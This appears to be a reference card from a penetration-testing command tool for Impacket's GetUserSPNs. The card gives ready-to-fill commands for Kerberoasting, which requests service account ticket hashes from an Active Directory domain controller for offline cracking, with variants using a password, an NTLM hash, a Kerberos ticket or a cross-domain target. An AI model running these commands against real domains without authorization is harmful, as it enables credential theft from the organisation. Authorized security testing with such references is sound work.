Impacket Kerberoast

Extract service account hashes via Kerberoasting

Tool
impacket-GetUserSPNs
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-GetUserSPNs -request -dc-ip '<ip>' '<domain>/<user>:<password>' -outputfile kerberoasting.hashes

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-GetUserSPNs -request -dc-ip '<ip>' -hashes ':<hash>' '<domain>/<user>' -outputfile kerberoasting.hashes

Kerberos Ticket requires Kerberos ticket

impacket-GetUserSPNs -request -dc-ip '<ip>' -k -no-pass '<domain>/<user>' -outputfile kerberoasting.hashes

Cross-Domain requires password

impacket-GetUserSPNs -request '<domain>/<user>:<password>' -outputfile kerberoasting.hashes -target-domain '<target_domain>'

Examples

impacket-GetUserSPNs -request -dc-ip '192.168.1.100' 'CORP/user:password' -outputfile kerberoasting.hashes

Tags

impacket kerberoast spn service-account hash